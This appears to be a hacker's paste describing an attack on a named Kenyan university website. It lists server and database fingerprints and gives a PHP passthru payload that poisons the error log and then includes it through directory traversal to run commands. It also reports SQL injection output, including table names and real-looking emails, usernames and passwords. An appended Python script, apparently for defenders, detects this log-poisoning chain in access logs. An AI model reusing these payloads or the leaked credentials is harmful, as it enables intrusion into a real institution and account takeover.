- Morning @lexxkinyanjui
- Exploit target:www.jkuat.ac.ke
- Host IP:41.204.161.16
- Web Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/1.0.0d FrontPage/5.0.2.2635 mod_auth_passthrough/2.1 mod_bwlimited/1.4 mod_perl/2.0.5 Perl/v5.12.3
- Powered-by: PHP/5.3.6
- DB Server: MySQL >=5
- Current User: jkuat_jkuat@localhost
- Sql Version: 5.1.58-log
- Current DB: jkuat_jkuat
- System User: jkuat_jkuat@localhost
- Host Name: cp-uon.kenet.or.ke
- Installation dir: /usr/local/
- DB User: 'jkuat_jkuat'@'localhost'
- Data Bases: information_schema
- jkuat_jkuat
- With this info you can choose the attack you want because you have the DB and server type:
- If you want an RFI or LFI attack you can use some of my code:
- http://www.jkuat.ac.ke/jamesscript=<? passthru(\$_GET[cmd]) ?>
- This will add a line into error_log, injecting my code. And
- now? We only have to load this file and send,
- by the cmd variable, the command we'd like to execute:
- for example: http://www.jkuat.ac.ke/?file=../../../var/apache/error_log&cmd=uname -a
- But this will be risky because they can resolve your address and/or location, plus Windows is not that advanced
- to handle more than 200 port connections:
- So SQL injection with ': working a little magic, here is what I got:
- DATABASE:jkuat_jkuat
- Table Name Columns
- tbl_user email password username
- tbl_units
- tbl_section
- tbl_programme_category
- tbl_programme
- tbl_links
- tbl_head
- tbl_faculty
- tbl_downloads_category
- tbl_downloads
- tbl_department
- tbl_contacts_main
- tbl_contacts
- tbl_comments
- tbl_campus_programme
- tbl_campus
- tbl_article
- tbl_announcement
- Now from there, since we have a users table that has email, passwords and username, we spoof again
- and we get
- email password username
- info@jkuat.ac.ke admin 89admin245
- kamochu@gmail.com kamochu001 kamochu
- DATABASE:information_schema
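For defenders, the error_log injection and file-include sequence described in the paste leaves a recognisable trail in the web server's access log. The following is an added detection example, not part of the original paste: the log lines are constructed samples, and the function names, regexes and finding labels are assumptions chosen for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Constructed sample access-log lines (common log format), not from any real server.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?page=news HTTP/1.1" 200 5120
203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /x=<?%20passthru($_GET[cmd])%20?> HTTP/1.1" 404 310
203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /?file=../../../var/apache/error_log&cmd=uname%20-a HTTP/1.1" 200 880
198.51.100.7 - - [01/Jan/2024:10:00:12 +0000] "GET /downloads.php?file=prospectus.pdf HTTP/1.1" 200 90211
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (.*) HTTP/[\d.]+" (\d{3})')
PHP_CODE = re.compile(r"<\?(php|=|\s)|\b(passthru|system|shell_exec|eval)\s*\(", re.I)
LOG_PATH = re.compile(r"(error|access)[_.-]?log", re.I)

def classify(target):
    """Return the set of findings for one request target (path plus query)."""
    findings = set()
    # Decode twice so single and double URL-encoding are both seen in clear.
    if PHP_CODE.search(unquote(unquote(target))):
        findings.add("php-code-in-request")
    # parse_qsl decodes once; decode again and normalise backslashes.
    for _name, value in parse_qsl(target.partition("?")[2], keep_blank_values=True):
        value = unquote(value).replace("\\", "/")
        if "../" in value and LOG_PATH.search(value):
            findings.add("traversal-to-log-file")
    return findings

def analyze(log_text):
    """Flag suspicious requests and correlate injection with a later log include."""
    poisoned_by = set()  # client IPs that have already sent PHP code in a request
    alerts = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ip, target, status = m.groups()
        findings = classify(target)
        if "php-code-in-request" in findings:
            poisoned_by.add(ip)
        if "traversal-to-log-file" in findings and ip in poisoned_by:
            findings.add("log-poisoning-chain")  # both stages from the same client
        if findings:
            alerts.append((ip, status, sorted(findings)))
    return alerts

if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG):
        print(alert)
```

A 200 response on a request flagged `log-poisoning-chain` is the case to triage first, since it means the include parameter returned content for a log path.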